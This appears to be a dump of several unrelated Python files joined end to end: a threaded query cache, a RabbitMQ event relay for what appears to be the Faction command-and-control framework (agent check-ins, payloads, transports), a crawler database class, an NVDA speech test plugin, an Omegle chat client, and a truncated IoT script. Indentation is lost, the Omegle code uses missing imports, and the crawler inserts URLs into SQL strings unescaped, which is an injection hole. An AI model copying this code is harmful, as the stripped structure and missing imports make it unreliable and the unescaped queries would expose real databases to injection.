then that is cached as well, and will be raised on further calls until the
cache expires as usual.
And yes, Virginia, QueryCache is thread-safe (as long as you don't invoke
the same instance again within your formatting callback).
"""
db = None # PostgresManager object
cache = None # the query cache [dictionary]
locks = None # access controls for self.cache [Locks]
threshold = 5 # maximum life of a cache entry [seconds as int]
threshold_prune = 60 # time between pruning runs [seconds as int]
def __init__(self, db, threshold=5, threshold_prune=60):
"""
"""
self.db = db
self.threshold = threshold
self.threshold_prune = threshold_prune
self.cache = {}
class Locks:
checkin = threading.Lock()
checkout = threading.Lock()
self.locks = Locks()
self.pruner = threading.Thread(target=self.prune)
self.pruner.setDaemon(True)
self.pruner.start()
def one(self, query, params=None, process=None):
return self._do_query(self.db.one, query, params, process)
def all(self, query, params=None, process=None):
return self._do_query(self.db.all, query, params, process)
def _do_query(self, fetchfunc, query, params, process):
"""Given a function, a SQL string, a tuple, and a function, return ???.
"""
# Compute a cache key.
# ====================
key = (query, params)
# Check out an entry.
# ===================
# Each entry has its own lock, and "checking out" an entry means
# acquiring that lock. If a queryset isn't yet in our cache, we first
# "check in" a new dummy entry for it (and prevent other threads from
# adding the same query), which will be populated presently.
self.locks.checkout.acquire()
try: # critical section
if key in self.cache:
# Retrieve an already cached query.
# =================================
# The cached entry may be a dummy. The best way to guarantee we
# will catch this case is to simply refresh our entry after we
# acquire its lock.
entry = self.cache[key]
entry.lock.acquire()
entry = self.cache[key]
else:
# Add a new entry to our cache.
# =============================
dummy = Entry()
dummy.lock.acquire()
self.locks.checkin.acquire()
try: # critical section
if key in self.cache:
# Someone beat us to it. XXX: can this actually happen?
entry = self.cache[key]
else:
self.cache[key] = dummy
entry = dummy
finally:
self.locks.checkin.release()
finally:
# Now that we've checked out our queryset, other threads are free
# to check out other queries.
self.locks.checkout.release()
# Process the query.
# ==================
try: # critical section
# Decide whether it's a hit or miss.
# ==================================
if time.time() - entry.timestamp < self.threshold: # cache hit
if entry.exc is not None:
raise entry.exc
return entry.result
else: # cache miss
try:
entry.result = fetchfunc(query, params)
if process is not None:
entry.result = process(entry.result)
entry.exc = None
except Exception as exc:
entry.result = None
entry.exc = exc
# Check the queryset back in.
# ===========================
self.locks.checkin.acquire()
try: # critical section
entry.timestamp = time.time()
self.cache[key] = entry
if entry.exc is not None:
raise entry.exc
else:
return entry.result
finally:
self.locks.checkin.release()
finally:
entry.lock.release()
def prune(self):
"""Periodically remove any stale queries in our cache.
"""
last = 0 # timestamp of last pruning run
while 1:
if time.time() < last + self.threshold_prune:
# Not time to prune yet.
time.sleep(0.2)
continue
self.locks.checkout.acquire()
try: # critical section
for key, entry in tuple(self.cache.items()):
# Check out the entry.
# ====================
# If the entry is currently in use, skip it.
available = entry.lock.acquire(False)
if not available:
continue
# Remove the entry if it is too old.
# ==================================
try: # critical section
if time.time() - entry.timestamp > self.threshold_prune:
del self.cache[key]
finally:
entry.lock.release()
finally:
self.locks.checkout.release()
last = time.time()
|
rabbitmq.py | import pika
from time import sleep
import json
import amqpstorm
from amqpstorm import Message
from config import RABBIT_HOST, RABBIT_USERNAME, RABBIT_PASSWORD
from logger import log
class Consumer(object):
"""Asynchronous Rpc client."""
def __init__(self):
log('rabbitmq-consumer:init', 'Creating client..')
self.queue = {}
self.host = RABBIT_HOST
self.username = RABBIT_USERNAME
self.password = RABBIT_PASSWORD
self.channel = None
self.connection = None
self.callback_queue = None
self.rpc_queue = 'ApiService'
self.socketio = None
self.open()
def open(self):
"""Open Connection."""
rabbit_connected = False
log('rabbitmq-consumer:open', 'Opening Connection..')
log("rabbitmq-consumer:open", "Checking RabbitMQ..")
while not rabbit_connected:
try:
credentials = pika.PlainCredentials(self.username, self.password)
connection = pika.BlockingConnection(pika.ConnectionParameters(host=self.host,
credentials=credentials,
socket_timeout=2,
blocked_connection_timeout=2))
rabbit_connected = True
log("rabbitmq-consumer:open", "RabbitMQ is up!")
connection.close()
except Exception as e:
rabbit_connected = False
log("rabbitmq-consumer:open", f"Connection Error: {str(e)}")
log("rabbitmq-consumer:open", "RabbitMQ not reachable.. waiting..")
sleep(2)
self.connection = amqpstorm.Connection(self.host, self.username,
self.password)
self.channel = self.connection.channel()
# Create the exchange
self.exchange = amqpstorm.channel.Exchange(self.channel)
self.exchange.declare(exchange='Core',
exchange_type='topic',
durable=True)
# Create the APIService queue
log('rabbitmq-consumer:open', 'Creating queue: {0}'.format(self.rpc_queue))
self.channel.queue.declare(self.rpc_queue, durable=True, exclusive=False, auto_delete=False, arguments=None)
self.channel.queue.bind(self.rpc_queue, exchange='Core', routing_key='AgentCheckinAnnouncement')
self.channel.queue.bind(self.rpc_queue, exchange='Core', routing_key='AgentCommandsUpdated')
self.channel.queue.bind(self.rpc_queue, exchange='Core', routing_key='AgentTaskUpdate')
self.channel.queue.bind(self.rpc_queue, exchange='Core', routing_key='AgentUpdated')
self.channel.queue.bind(self.rpc_queue, exchange='Core', routing_key='ConsoleMessageAnnouncement')
self.channel.queue.bind(self.rpc_queue, exchange='Core', routing_key='DevPayloadCreated')
self.channel.queue.bind(self.rpc_queue, exchange='Core', routing_key='ErrorMessageAnnouncement')
self.channel.queue.bind(self.rpc_queue, exchange='Core', routing_key='NewFactionFile')
self.channel.queue.bind(self.rpc_queue, exchange='Core', routing_key='NewAgent')
self.channel.queue.bind(self.rpc_queue, exchange='Core', routing_key='PayloadCreated')
self.channel.queue.bind(self.rpc_queue, exchange='Core', routing_key='PayloadUpdated')
self.channel.queue.bind(self.rpc_queue, exchange='Core', routing_key='TransportCreated')
self.channel.queue.bind(self.rpc_queue, exchange='Core', routing_key='TransportUpdated')
self.channel.basic.consume(self._on_response, no_ack=True, queue=self.rpc_queue)
# Create Callback queue
result = self.channel.queue.declare(exclusive=True)
log("rabbitmq-consumer:open", "Creating callback queue: {}".format(result['queue']))
self.callback_queue = result['queue']
self.channel.basic.consume(self._on_response, no_ack=True,
queue=self.callback_queue)
# self._create_process_thread()
#
# def _create_process_thread(self):
# """Create a thread responsible for consuming messages in response
# to RPC requests.
# """
#
# log("rabbitmq-consumer:_create_process_thread", "Creating Thread..")
# thread = threading.Thread(target=self._process_data_events)
# thread.setDaemon(True)
# thread.start()
return self
def update_queue(self, message_id):
log("rabbitmq-consumer:update_queue", "Adding message id: {}".format(message_id))
self.queue[message_id] = None
def process_data_events(self):
"""Process Data Events using the Process Thread."""
log("rabbitmq-consumer:_process_data_events", "Consuming..")
self.channel.start_consuming()
def _on_response(self, message):
"""On Response store the message with the correlation id in a local
dictionary.
"""
# TODO: This could be more nuanced, but who has time for that.
try:
log('rabbitmq-consumer:_on_response', 'Message Properties: {0}'.format(json.dumps(message.properties)))
log('rabbitmq-consumer:_on_response', 'Message Body: {0}'.format(message.body))
if message.correlation_id in self.queue:
log('rabbitmq-consumer:_on_response', 'Got a response to one of our messages. Updating queue.')
self.queue[message.correlation_id] = message.body
# AGENT CHECKIN ANNOUNCEMENT
elif message.properties['message_type'] == 'AgentCheckinAnnouncement':
log("rabbitmq-consumer:_on_response", "Got AgentCheckinAnnouncement at {0}".format(message.timestamp))
agentCheckin = json.loads(message.body)
log("rabbitmq-consumer:_on_response", "Publishing message: {0}".format(str(agentCheckin)))
self.socketio.emit('agentCheckin', agentCheckin)
# AGENT COMMANDS UPDATED
elif message.properties['message_type'] == 'AgentCommandsUpdated':
log("rabbitmq-consumer:_on_response", "Got AgentCommandsUpdated at {0}".format(message.timestamp))
agentCommandsUpdated = json.loads(message.body)
log("rabbitmq-consumer:_on_response", "Publishing message: {0}".format(str(agentCommandsUpdated)))
self.socketio.emit('agentCommandsUpdated', agentCommandsUpdated, room=agentCommandsUpdated["AgentId"])
# AGENT UPDATED
elif message.properties['message_type'] == 'AgentUpdated':
log("rabbitmq-consumer:_on_response", "Got AgentUpdated at {0}".format(message.timestamp))
agentUpdated = json.loads(message.body)
log("rabbitmq-consumer:_on_response", "Publishing message: {0}".format(str(agentUpdated)))
self.socketio.emit('agentUpdated', agentUpdated)
# CONSOLE MESSAGE ANNOUNCEMENT
elif message.properties['message_type'] == 'ConsoleMessageAnnouncement':
log("rabbitmq-consumer:_on_response", "Got ConsoleMessageAnnouncement")
message = json.loads(message.body)
consoleMessage = message['ConsoleMessage']
consoleMessage['Username'] = message['Username']
consoleMessage.pop('Content', None)
log("rabbitmq-consumer:_on_response", "Publishing message: {0}".format(str(consoleMessage)))
self.socketio.emit('consoleMessageAnnouncement', consoleMessage, room=consoleMessage["AgentId"])
# DEV PAYLOAD CREATED
elif message.properties['message_type'] == 'DevPayloadCreated':
log("rabbitmq-consumer:_on_response", "Got DevPayloadCreated at {0}".format(message.timestamp))
devPayloadComplete = json.loads(message.body)
log("rabbitmq-consumer:_on_response", "Publishing message: {0}".format(str(devPayloadComplete)))
self.socketio.emit('devPayloadCreated', devPayloadComplete)
# ERROR MESSAGE ANNOUNCEMENT
elif message.properties['message_type'] == 'ErrorMessageAnnouncement':
log("rabbitmq-consumer:_on_response", "Got ErrorMessageAnnouncement at {0}".format(message.timestamp))
errorMessageAnnouncement = json.loads(message.body)
log("rabbitmq-consumer:_on_response", "Publishing message: {0}".format(str(errorMessageAnnouncement)))
# TL;DR - We only broadcast errors if they didn't come from API
# I *think* this is the right way to go about this. API errors shouldn't typically be of interest to
# everyone using Faction and the API is going to reply back with the error message when it encounters
# it.
if errorMessageAnnouncement['Source'] != 'API':
self.socketio.emit('errorMessageAnnouncement', errorMessageAnnouncement)
else:
self.socketio.emit('errorMessageAnnouncement', errorMessageAnnouncement, broadcast=True)
# NEW FACTION FILE
elif message.properties['message_type'] == 'NewFactionFile':
log("rabbitmq-consumer:_on_response", "Got NewFactionFile")
fileMessage = json.loads(message.body)
log("rabbitmq-consumer:_on_response", "Emitting: {0}".format(message.body))
self.socketio.emit('newFile', fileMessage)
# NEW AGENT
elif message.properties['message_type'] == 'NewAgent':
log("rabbitmq-consumer:_on_response", "Got NewAgent at {0}".format(message.timestamp))
agent = json.loads(message.body)
agent['Success'] = True
log("rabbitmq-consumer:_on_response", "Publishing message: {0}".format(str(agent)))
self.socketio.emit('newAgent', agent, broadcast=True)
# PAYLOAD CREATED
elif message.properties['message_type'] == 'PayloadCreated':
log("rabbitmq-consumer:_on_response", "Got PayloadCreated")
payloadMessage = json.loads(message.body)
log("rabbitmq-consumer:_on_response", "Emitting: {0}".format(message.body))
self.socketio.emit('payloadCreated', payloadMessage)
# PAYLOAD UPDATED
elif message.properties['message_type'] == 'PayloadUpdated':
log("rabbitmq-consumer:_on_response", "Got PayloadUpdate")
payloadUpdateMessage = json.loads(message.body)
log("rabbitmq-consumer:_on_response", "Emitting: {0}".format(message.body))
self.socketio.emit('payloadUpdated', payloadUpdateMessage)
# TRANSPORT CREATED
elif message.properties['message_type'] == 'TransportCreated':
log("rabbitmq-consumer:_on_response", "Got TransportCreated")
transportMessage = json.loads(message.body)
log("rabbitmq-consumer:_on_response", "Emitting: {0}".format(message.body))
self.socketio.emit('transportCreated', transportMessage)
# TRANSPORT UPDATED
elif message.properties['message_type'] == 'TransportUpdated':
log("rabbitmq-consumer:_on_response", "Got TransportUpdated")
transportMessage = json.loads(message.body)
log("rabbitmq-consumer:_on_response", "Emitting: {0}".format(message.body))
self.socketio.emit('transportUpdated', transportMessage)
# AGENT CHECKIN ANNOUNCEMENT
# TODO: Why aren't we doing anything with this?
elif message.properties['message_type'] == 'AgentCheckinAnnouncement':
log("rabbitmq-consumer:_on_response", "Got AgentCheckinAnnouncement!")
# AGENT TASKUPDATE
# TODO: Why aren't we doing anything with this?
elif message.properties['message_type'] == 'AgentTaskUpdate':
log("rabbitmq-consumer:_on_response", "Got AgentTaskUpdate")
except Exception as e:
log("rabbitmq-consumer:_on_response", "ERROR PROCESSING RABBITMQ MESSAGE: {0}".format(e))
rabbit_consumer = Consumer()
class Producer(object):
"""Asynchronous Rpc client."""
def __init__(self):
log("rabbitmq-producer:open", "Creating client..")
self.queue = {}
self.host = RABBIT_HOST
self.username = RABBIT_USERNAME
self.password = RABBIT_PASSWORD
self.channel = None
self.connection = None
self.rpc_queue = 'ApiService'
self.callback_queue = None
self.open()
def open(self):
"""Open Connection."""
rabbit_connected = False
log("rabbitmq-producer:open", "Opening Connection..")
log("rabbitmq-producer:open", "Checking RabbitMQ..")
while not rabbit_connected:
try:
credentials = pika.PlainCredentials(self.username, self.password)
connection = pika.BlockingConnection(pika.ConnectionParameters(host=self.host,
credentials=credentials,
socket_timeout=2,
blocked_connection_timeout=2))
rabbit_connected = True
log("rabbitmq-producer:open", "RabbitMQ is up!")
connection.close()
except:
rabbit_connected = False
log("rabbitmq-producer:open", "RabbitMQ not reachable.. waiting..")
sleep(2)
return self
def send_request(self, routing_key, message, callback=False):
# Create the Message object.
log("rabbitmq-producer:send_request", "Got message: {0} with routing_key: {1}".format(message, routing_key))
message = Message.create(rabbit_consumer.channel, json.dumps(message))
if callback:
message.reply_to = rabbit_consumer.callback_queue
rabbit_consumer.update_queue(message.correlation_id)
# Create an entry in our local dictionary, using the automatically
# generated correlation_id as our key.
message.properties['message_type'] = routing_key
# Publish the RPC request.
log("rabbitmq-producer:send_request", "Publishing message..")
message.publish(routing_key=routing_key, exchange='Core')
# Return the Unique ID used to identify the request.
log("rabbitmq-producer:send_request", "Got correlation_id: {0}".format(str(message.correlation_id)))
return message.correlation_id
rabbit_producer = Producer()
|
database.py | import pymysql, re, time
from threading import Thread
from colorama import init, Fore, Style
from urllib.parse import quote, unquote
from sys import exit
class Database(object):
def __init__(self, user, password, database, host='127.0.0.1', port=3306):
try:
init()
self.db = pymysql.connect (
host = host,
port = port,
user = user,
password = password,
db = database
)
self.cursor = self.db.cursor()
except Exception as e:
Database.error(e, '0x1')
exit()
@staticmethod
def error(err, err_code):
print(Fore.RED + 'BETA database error %s:%s' % (err_code, err, ))
print(Style.RESET_ALL)
def get_queue(self, num_links=10):
self.execute("SELECT url FROM queue WHERE visited = '0' LIMIT %d;" % (num_links, ))
result = self.cursor.fetchall()
response = []
self.remove(result)
for i in range(len(result)):
response.append(unquote(result[i][0]))
response[i] = re.sub(r'(\\)*$', '', response[i])
return response
def write_to_db(self, url):
try:
self.execute("INSERT INTO queue (url, visited, unixtime) VALUES ('%s', 0, '%d');" % (self.escape_url(url), int(time.time()), ))
print(Fore.GREEN + 'Added', url, 'to queue.')
print(Style.RESET_ALL)
except Exception as e:
if not '(1062, "Duplicate entry ' in str(e):
Database.error(e, '0x2')
def set_queue(self, urls):
for url in urls:
t = Thread(target=self.write_to_db(url))
t.daemon = True
t.start()
return True
def escape_url(self, url):
return re.sub(r'(\\)*$', '', url)
def update_queue(self, url):
try:
self.execute("UPDATE queue SET visited=1, unixtime='%d' WHERE url = '%s';" % (int(time.time()), self.escape_url(url), ))
except Exception as e:
Database.error(e, '0x3')
def remove(self, urls):
for line in urls:
url = line[0]
t = Thread(target=self.update_queue(url))
t.daemon = True
t.start()
def execute(self, command):
self.cursor.execute(command)
self.db.commit()
def close(self):
self.db.close()
|
speechSpyGlobalPlugin.py | # A part of NonVisual Desktop Access (NVDA)
# Copyright (C) 2018 NV Access Limited
# This file may be used under the terms of the GNU General Public License, version 2 or later.
# For more details see: https://www.gnu.org/licenses/gpl-2.0.html
"""This module provides an NVDA global plugin which creates a and robot library remote server.
It allows tests to get information out of NVDA.
It is copied into the (system test specific) NVDA profile directory. It becomes the '__init__.py' file as part
of a package.
"""
import typing
from typing import Optional
import globalPluginHandler
import threading
from .blockUntilConditionMet import _blockUntilConditionMet
from logHandler import log
from time import perf_counter as _timer
from keyboardHandler import KeyboardInputGesture
import inputCore
import queueHandler
import watchdog
import sys
import os
def _importRobotRemoteServer() -> typing.Type:
log.debug(f"before path mod: {sys.path}")
# Get the path to the top of the package
TOP_DIR = os.path.abspath(os.path.dirname(__file__))
# imports that require libraries not distributed with an install of NVDA
sys.path.append(os.path.join(TOP_DIR, "libs"))
log.debug(f"after path mod: {sys.path}")
from robotremoteserver import RobotRemoteServer
return RobotRemoteServer
class NVDASpyLib:
""" Robot Framework Library to spy on NVDA during system tests.
Used to determine if NVDA has finished starting, and various ways of getting speech output.
All public methods are part of the Robot Library
"""
SPEECH_HAS_FINISHED_SECONDS: float = 0.5
def __init__(self):
# speech cache is ordered temporally, oldest at low indexes, most recent at highest index.
self._nvdaSpeech_requiresLock = [ # requires thread locking before read/write
[""], # initialise with an empty string, this allows for access via [-1]. This is equiv to no speech.
]
self._lastSpeechTime_requiresLock = _timer()
#: Lock to protect members written in _onNvdaSpeech.
self._speechLock = threading.RLock()
self._isNvdaStartupComplete = False
self._allSpeechStartIndex = self.get_last_speech_index()
self._maxKeywordDuration = 30
self._registerWithExtensionPoints()
def _registerWithExtensionPoints(self):
from core import postNvdaStartup
postNvdaStartup.register(self._onNvdaStartupComplete)
# This file (`speechSpyGlobalPlugin.py`) is moved to
# "scratchpad/globalPlugins/speechSpyGlobalPlugin/__init__.py"
# Import path must be valid after `speechSpySynthDriver.py` is moved to "scratchpad/synthDrivers/"
from synthDrivers.speechSpySynthDriver import post_speech
post_speech.register(self._onNvdaSpeech)
# callbacks for extension points
def _onNvdaStartupComplete(self):
self._isNvdaStartupComplete = True
def _onNvdaSpeech(self, speechSequence=None):
if not speechSequence:
return
with self._speechLock:
self._lastSpeechTime_requiresLock = _timer()
self._nvdaSpeech_requiresLock.append(speechSequence)
@staticmethod
def _getJoinedBaseStringsFromCommands(speechCommandArray) -> str:
baseStrings = [c for c in speechCommandArray if isinstance(c, str)]
return ''.join(baseStrings).strip()
def _getSpeechAtIndex(self, speechIndex):
with self._speechLock:
return self._getJoinedBaseStringsFromCommands(self._nvdaSpeech_requiresLock[speechIndex])
def get_speech_at_index_until_now(self, speechIndex: int) -> str:
""" All speech from (and including) the index until now.
@param speechIndex:
@return: The speech joined together, see L{_getJoinedBaseStringsFromCommands}
"""
with self._speechLock:
speechCommands = [
self._getJoinedBaseStringsFromCommands(x) for x in self._nvdaSpeech_requiresLock[speechIndex:]
]
return "\n".join(x for x in speechCommands if x and not x.isspace())
def get_last_speech_index(self) -> int:
with self._speechLock:
return len(self._nvdaSpeech_requiresLock) - 1
def _getIndexOfSpeech(self, speech, searchAfterIndex: Optional[int] = None):
if searchAfterIndex is None:
firstIndexToCheck = 0
else:
firstIndexToCheck = 1 + searchAfterIndex
with self._speechLock:
for index, commands in enumerate(self._nvdaSpeech_requiresLock[firstIndexToCheck:]):
index = index + firstIndexToCheck
baseStrings = [c.strip() for c in commands if isinstance(c, str)]
if any(speech in x for x in baseStrings):
return index
return -1
def _hasSpeechFinished(self, speechStartedIndex: Optional[int] = None):
with self._speechLock:
started = speechStartedIndex is None or speechStartedIndex < self.get_next_speech_index()
finished = self.SPEECH_HAS_FINISHED_SECONDS < _timer() - self._lastSpeechTime_requiresLock
return started and finished
def _devInfoToLog(self):
import api
obj = api.getNavigatorObject()
if hasattr(obj, "devInfo"):
log.info("Developer info for navigator object:\n%s" % "\n".join(obj.devInfo))
else:
log.info("No developer info for navigator object")
def dump_speech_to_log(self):
log.debug("dump_speech_to_log.")
with self._speechLock:
try:
self._devInfoToLog()
except Exception:
log.error("Unable to log dev info")
try:
log.debug(f"All speech:\n{repr(self._nvdaSpeech_requiresLock)}")
except Exception:
log.error("Unable to log speech")
def _minTimeout(self, timeout: float) -> float:
"""Helper to get the minimum value, the timeout passed in, or self._maxKeywordDuration"""
return min(timeout, self._maxKeywordDuration)
def init_max_keyword_duration(self, maxSeconds: float):
"""This should only be called once, immediately after importing the library.
@param maxSeconds: Should match the 'timeout' value given to the `robot.libraries.Remote` instance. If
this value is greater than the value for the `robot.libraries.Remote` instance it may mean that the test
is failed, and NVDA is never exited, requiring manual intervention.
Should be set to a large value like '30' (seconds).
"""
self._maxKeywordDuration = maxSeconds - 1
def wait_for_NVDA_startup_to_complete(self):
_blockUntilConditionMet(
getValue=lambda: self._isNvdaStartupComplete,
giveUpAfterSeconds=self._minTimeout(10),
errorMessage="Unable to connect to nvdaSpy",
)
if self._isNvdaStartupComplete:
self.reset_all_speech_index()
def get_last_speech(self) -> str:
return self._getSpeechAtIndex(-1)
def get_all_speech(self) -> str:
return self.get_speech_at_index_until_now(self._allSpeechStartIndex)
def reset_all_speech_index(self) -> int:
self._allSpeechStartIndex = self.get_last_speech_index()
return self._allSpeechStartIndex
def get_next_speech_index(self) -> int:
""" @return: the next index that will be used.
"""
return self.get_last_speech_index() + 1
def wait_for_specific_speech(
self,
speech: str,
afterIndex: Optional[int] = None,
maxWaitSeconds: int = 5,
) -> int:
"""
@param speech: The speech to expect.
@param afterIndex: The speech should come after this index. The index is exclusive.
@param maxWaitSeconds: The amount of time to wait in seconds.
@return: the index of the speech.
"""
success, speechIndex = _blockUntilConditionMet(
getValue=lambda: self._getIndexOfSpeech(speech, afterIndex),
giveUpAfterSeconds=self._minTimeout(maxWaitSeconds),
shouldStopEvaluator=lambda indexFound: indexFound >= (afterIndex if afterIndex else 0),
intervalBetweenSeconds=0.1,
errorMessage=None
)
if not success:
self.dump_speech_to_log()
raise AssertionError(
"Specific speech did not occur before timeout: {}\n"
"See NVDA log for dump of all speech.".format(speech)
)
return speechIndex
def wait_for_speech_to_finish(
self,
maxWaitSeconds=5.0,
speechStartedIndex: Optional[int] = None
):
_blockUntilConditionMet(
getValue=lambda: self._hasSpeechFinished(speechStartedIndex=speechStartedIndex),
giveUpAfterSeconds=self._minTimeout(maxWaitSeconds),
errorMessage="Speech did not finish before timeout"
)
def emulateKeyPress(self, kbIdentifier: str, blockUntilProcessed=True):
"""
Emulates a key press using NVDA's input gesture framework.
The key press will either result in a script being executed, or the key being sent on to the OS.
By default this method will block until any script resulting from this key has been executed,
and the NVDA core has again gone back to sleep.
@param kbIdentifier: an NVDA keyboard gesture identifier.
0 or more modifier keys followed by a main key, all separated by a plus (+) symbol.
E.g. control+shift+downArrow.
See vkCodes.py in the NVDA source directory for valid key names.
"""
gesture = KeyboardInputGesture.fromName(kbIdentifier)
inputCore.manager.emulateGesture(gesture)
if blockUntilProcessed:
# Emulating may have queued a script or events.
# Insert our own function into the queue after, and wait for that to be also executed.
queueProcessed = set()
def _setQueueProcessed():
nonlocal queueProcessed
queueProcessed = True
queueHandler.queueFunction(queueHandler.eventQueue, _setQueueProcessed)
_blockUntilConditionMet(
getValue=lambda: queueProcessed,
giveUpAfterSeconds=self._minTimeout(5),
errorMessage="Timed out waiting for key to be processed",
)
# We know that by now the core will have woken up and processed the scripts, events and our own function.
# Wait for the core to go to sleep,
# Which means there is no more things the core is currently processing.
_blockUntilConditionMet(
getValue=lambda: watchdog.isCoreAsleep(),
giveUpAfterSeconds=self._minTimeout(5),
errorMessage="Timed out waiting for core to sleep again",
)
class SystemTestSpyServer(globalPluginHandler.GlobalPlugin):
def __init__(self):
super().__init__()
self._server = None
self._start()
def _start(self):
log.debug("SystemTestSpyServer started")
spyLibrary = NVDASpyLib() # spies on NVDA
RobotRemoteServer = _importRobotRemoteServer()
server = self._server = RobotRemoteServer(
spyLibrary, # provides library behaviour
port=8270, # default:8270 is `registered by IANA` for remote server usage. Two ASCII values, RF.
serve=False # we want to start this serving on another thread so as not to block.
)
log.debug("Server address: {}".format(server.server_address))
server_thread = threading.Thread(target=server.serve, name="RF Test Spy Thread")
server_thread.start()
def terminate(self):
log.debug("Terminating the SystemTestSpyServer")
self._server.stop()
GlobalPlugin = SystemTestSpyServer
GlobalPlugin.__gestures = {
}
|
Omegle.py | #! /usr/bin/python
############################################################
############################################################
##
##
## Copyright 2015 William Whitty
## will.whitty.arbeit@gmail.com
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
##
############################################################
############################################################
# Import STD
import sys
import json
import time
import threading
import urllib2
# Import Global
# Import Local
def help_function():
print """
___ ___ ___ ___ ___ ___
/\ \ /\__\ /\ \ /\ \ /\__\ /\ \
/::\ \ /::| | /::\ \ /::\ \ /:/ / /::\ \
/:/\:\ \ /:|:| | /:/\:\ \ /:/\:\ \ /:/ / /:/\:\ \
/:/ \:\ \ /:/|:|__|__ /::\~\:\ \ /:/ \:\ \ /:/ / /::\~\:\ \
/:/__/ \:\__\ /:/ |::::\__\ /:/\:\ \:\__\ /:/__/_\:\__\ /:/__/ /:/\:\ \:\__\
\:\ \ /:/ / \/__/~~/:/ / \:\~\:\ \/__/ \:\ /\ \/__/ \:\ \ \:\~\:\ \/__/
\:\ /:/ / /:/ / \:\ \:\__\ \:\ \:\__\ \:\ \ \:\ \:\__\
\:\/:/ / /:/ / \:\ \/__/ \:\/:/ / \:\ \ \:\ \/__/
\::/ / /:/ / \:\__\ \::/ / \:\__\ \:\__\
\/__/ \/__/ \/__/ \/__/ \/__/ \/__/
Coded by William Whitty.
Connects you to Omegle.com, a site for talking with random strangers.
Type:
next > End the conversation and move to the next stranger
kill > End all conversations and quit the program
help > Show this dialog
"""
class Omegle:
""" Used for communication with Omegle """
def __init__(self, **kwargs):
""" Our constructor """
# Our connection ID
self.handle = None
self.stranger = None
# Begin a connection
if kwargs.get('connect', True):
self.connect()
def error(self, message = ''):
""" Give an error to the stdout """
print "Error: " + message
def valid(self):
""" Check the validity of internal variables """
# We were unable to create a connection
if self.handle == '{}':
self.error('could not connect to Omegle.com')
return False
# Everything is correct
return True
def response(self):
""" Get a RAW response from the stranger """
try:
return urlopen(self.stranger).read()
except:
return ''
def wait_callback(self):
""" Called when we are waiting for a connection """
print 'Waiting...'
def conn_callback(self):
""" Called when we are connected to an active user """
print 'Connected to a random stranger!\n'
def exit_callback(self):
""" Called when we are disconnected from a session """
print 'Stranger disconnected!\n'
self.connect()
def type_callback(self):
""" Called when the stranger is typing """
print 'Stranger is typing...'
def hear_callback(self, message):
""" Called when the stranger sends us a message """
print 'Stranger: ' + message
def listen(self):
""" Used to listen for convesation partner input """
# Error checking
if not self.valid():
return
# Loop until told to quit
while True:
# Get a response from the stranger
response = self.response()
# If the stranger has disconnected
if 'strangerDisconnected' in response:
self.exit_callback()
# If the stranger is typing...
elif 'typing' in response:
self.type_callback()
# If the stranger has sent us a message
elif 'gotMessage' in response:
self.hear_callback(response[16 : -3])
def connect(self):
""" Begin a new conversation """
# Initialise the connection and return the url
self.handle = urlopen('http://omegle.com/start').read()
# Check for errors
if not self.valid():
return
# Strip the handle string of quotations
self.handle = self.handle[1 : -1]
# Save our nevent request
self.stranger = Request('http://omegle.com/events', 'id=' + self.handle)
# Get the response
response = self.response()
# If we're still waiting for a stranger
if 'waiting' in response:
self.wait_callback()
# If we've got a good connection
if 'connected' in response:
self.conn_callback()
def process(self, message):
""" Check user input for terminal commands """
# Check for our exit button
if message == 'kill':
quit(0)
# Check for a help request
if message == 'help':
help_function()
return True
# No processing
return False
def type(self):
""" Tell Omegle that we're typing something """
# Check for a valid handle
if not self.valid():
return
# Tell Omegl that we're typing
urlopen('http://omegle.com/typing', 'id=' + self.handle).close()
def talk(self, message, **kwargs):
""" Send a message to our conversation partner """
# Output to the terminal
if kwargs.get('show', True):
print 'You: ' + message
# Process terminal commands
if kwargs.get('process', True):
if self.process(message):
return
# Error checking
if not self.valid():
return
# Talk to Omegle
msgReq = urlopen('http://omegle.com/send', 'msg=' + message + '&id=' + self.handle).close()
def start_thread(self):
""" Begins a listener in a seperate thread, so that the user can give input """
# Set our listener function as the thread callback
self.listener = threading.Thread(target=self.listen)
# Specify that this thread should not prevent us from exiting the program
self.listener.daemon = True
# Start the thread
self.listener.start()
def user_input(self):
""" Called when the stranger sends us a message """
# Pointer to internal thread
self.listener = None
while True:
# Connect to a new stranger
self.connect()
# Start listening
self.start_thread()
while True:
# Tell Omegle that we're typing
self.type()
# Get some input from the user
input = raw_input()
if 'next' in input:
self.listener.join(0)
break
# Send the text to the stranger
self.talk(input, show=False)
if __name__ == '__main__':
# Display the user help
help_function()
# Create our Omegle instance
handle = Omegle(connect=False)
handle.user_input()
|
DAN.py | import time, random, threading, requests
import csmapi
# example
profile = {
# 'd_name': None,
'dm_name': 'MorSensor',
'u_name': 'yb',
'is_sim': False,
'df_list': ['Acceleration', 'Temperature'],
}
mac_addr = None
state = 'SUSPEND' #for control channel
#state = 'RESUME'
SelectedDF = []
def ControlChannel():
global state, SelectedDF
print('Device state:', state)
NewSession=requests.Session()
control_channel_timestamp = None
while True:
time.sleep(2)
try:
CH = csmapi.pull(MAC,'__Ctl_O__', NewSession)
if CH != []:
if control_channel_timestamp == CH[0][0]: continue
control_channel_timestamp = CH[0][0]
cmd = CH[0][1][0]
if cmd == 'RESUME':
print('Device state: RESUME.')
state = 'RESUME'
elif cmd == 'SUSPEND':
print('Device state: SUSPEND.')
state = 'SUSPEND'
elif cmd == 'SET_DF_STATUS':
csmapi.push(MAC,'__Ctl_I__',['SET_DF_STATUS_RSP',{'cmd_params':CH[0][1][1]['cmd_params']}], NewSession)
DF_STATUS = list(CH[0][1][1]['cmd_params'][0])
SelectedDF = []
index=0
profile['df_list'] = csmapi.pull(MAC, 'profile')['df_list'] #new
for STATUS in DF_STATUS:
if STATUS == '1':
SelectedDF.append(profile['df_list'][index])
index=index+1
except Exception as e:
print ('Control error:', e)
if str(e).find('mac_addr not found:') != -1:
print('Reg_addr is not found. Try to re-register...')
device_registration_with_retry()
else:
print('ControlChannel failed due to unknow reasons.')
time.sleep(1)
def get_mac_addr():
from uuid import getnode
mac = getnode()
mac = ''.join(("%012X" % mac)[i:i+2] for i in range(0, 12, 2))
return mac
def detect_local_ec():
EASYCONNECT_HOST=None
import socket
